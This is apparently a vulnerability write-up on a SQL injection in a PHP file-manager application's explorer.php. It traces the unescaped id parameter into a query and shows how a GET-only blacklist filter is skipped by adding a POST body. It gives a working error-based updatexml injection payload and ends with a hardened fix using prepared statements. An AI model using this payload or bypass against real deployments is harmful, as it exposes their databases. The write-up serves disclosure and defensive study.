PHP…

SQL injection

It occurs at line 151 of /dzz/system/explorer.php:

$arr=array();
$icos=array();
$icosdata=array();
$folderdata=array();
$folderids=array();
// $id is interpolated straight into the SQL string, with no escaping or type check
if($folder=DB::fetch_first('select * from '.DB::table('folder')." where fid='{$id}'")){

$id is assigned at lines 23~30:

$sid=empty($_GET['id'])?0:$_GET['id'];   // raw GET parameter, no validation
$winid=$_GET['winid'];
$bz=rawurldecode($_GET['bz']);
$path=rawurldecode($_GET['path']);
$data=array();
list($prex,$id)=explode('-',$sid);       // e.g. "f-123" gives $prex='f', $id='123'

As you can see, the value of $sid is split and the two parts are assigned to $prex and $id.
Continuing down to lines 117~151:

elseif($prex=='f'){      // branch taken when the id prefix is 'f'
if($bz){
...
else{
...
// the same unescaped interpolation of $id into the query
if($folder=DB::fetch_first('select * from '.DB::table('folder')." where fid='{$id}'")){

From the above, we only need $prex == 'f' to reach this SQL trigger point.
The route was obtained from /dzz/system/save.php.

payload:

index.php?mod=system&op=explorer&do=get_children&id=f-123'

It got filtered; the debug output contained several entries that looked like filter functions.
They were found in the _init_output function of /core/class/dzz/dzz_app.php:

private function _init_output() {

// the URL check is only invoked when the config option is on and the request method is GET
if($this->config['security']['urlxssdefend'] && $_SERVER['REQUEST_METHOD'] == 'GET' && !empty($_SERVER['REQUEST_URI'])) {
$this->_xss_check();
}

Looking up the _xss_check function, its contents are as follows:

private function _xss_check() {

// blacklist of substrings that abort the request
static $check = array('"', '>', '<', '\'', 'CONTENT-TRANSFER-ENCODING');

if($_SERVER['REQUEST_METHOD'] == 'GET' ) {
$temp = $_SERVER['REQUEST_URI'];
} elseif(empty($_GET['formhash'])) {
$temp = $_SERVER['REQUEST_URI'].file_get_contents('php://input');
} else {
$temp = '';
}

if(!empty($temp)) {
// decode twice and upper-case before matching the blacklist
$temp = strtoupper(urldecode(urldecode($temp)));
foreach ($check as $str) {
if(strpos($temp, $str) !== false) {
system_error('request_tainting');
}
}
}

return true;
}

The single quote is on the blacklist, which is what triggered the error.
However, it can be bypassed through the _init_output function:

private function _init_output() {

// a non-GET request never reaches _xss_check, whatever its query string contains
if($this->config['security']['urlxssdefend'] && $_SERVER['REQUEST_METHOD'] == 'GET' && !empty($_SERVER['REQUEST_URI'])) {
$this->_xss_check();
}

Its condition includes $_SERVER['REQUEST_METHOD'] == 'GET', so by sending parameters via GET and POST at the same time, the request never enters _xss_check.

payload:

GET:
index.php?mod=system&op=explorer&do=get_children&id=f-123' and updatexml(1,concat('~',version(),'~'),1) and '1'='1
POST:
1=1

Note: the filter function can be bypassed by bypassing the condition that triggers it.
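As an added example, not code from the application or from the original post: a hardened version of the explorer.php folder lookup, together with a request check that does not depend on the HTTP method. The PDO connection $pdo, the table name pre_folder and the function names are assumptions made for this example.

```php
<?php
// Added example, not the application's own code: a hardened version of the
// explorer.php folder lookup. The PDO connection $pdo and the table name
// pre_folder are assumptions made for this example.
// Parse an "f-123" style id into prefix and numeric id. Anything that is not
// prefix, dash, digits is rejected before any SQL is built, so a value such
// as "f-123'" never reaches a query.
function parse_explorer_id(string $sid): ?array {
    if (!preg_match('/^([a-z]+)-(\d+)$/D', $sid, $m)) {
        return null;
    }
    return ['prex' => $m[1], 'id' => (int) $m[2]];
}

// Fetch the folder row with a prepared statement: fid is bound as data
// instead of being interpolated into the query text ("where fid='{$id}'").
function fetch_folder(PDO $pdo, int $fid): ?array {
    $stmt = $pdo->prepare('SELECT * FROM pre_folder WHERE fid = :fid');
    $stmt->bindValue(':fid', $fid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// _xss_check only runs when REQUEST_METHOD is GET, so the query string of a
// POST request is never inspected. This variant inspects REQUEST_URI for
// every method. It remains a blacklist and is only defence in depth; the
// prepared statement above is the actual fix.
function request_has_tainted_query(array $server): bool {
    static $check = ['"', '>', '<', "'", 'CONTENT-TRANSFER-ENCODING'];
    $uri = $server['REQUEST_URI'] ?? '';
    if ($uri === '') {
        return false;
    }
    $temp = strtoupper(urldecode(urldecode($uri)));
    foreach ($check as $str) {
        if (strpos($temp, $str) !== false) {
            return true;
        }
    }
    return false;
}

// Constructed sample requests: the same query string sent as GET and as POST.
foreach (['GET', 'POST'] as $method) {
    $server = ['REQUEST_METHOD' => $method,
               'REQUEST_URI' => "/index.php?mod=system&op=explorer&id=f-123'"];
    echo $method, ' tainted=', var_export(request_has_tainted_query($server), true),
         ' parsed=', var_export(parse_explorer_id("f-123'"), true), PHP_EOL;
}
```

With the method-independent check, both sample requests are flagged, and the parser rejects the id before fetch_folder is ever called.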

(ง •_•)ง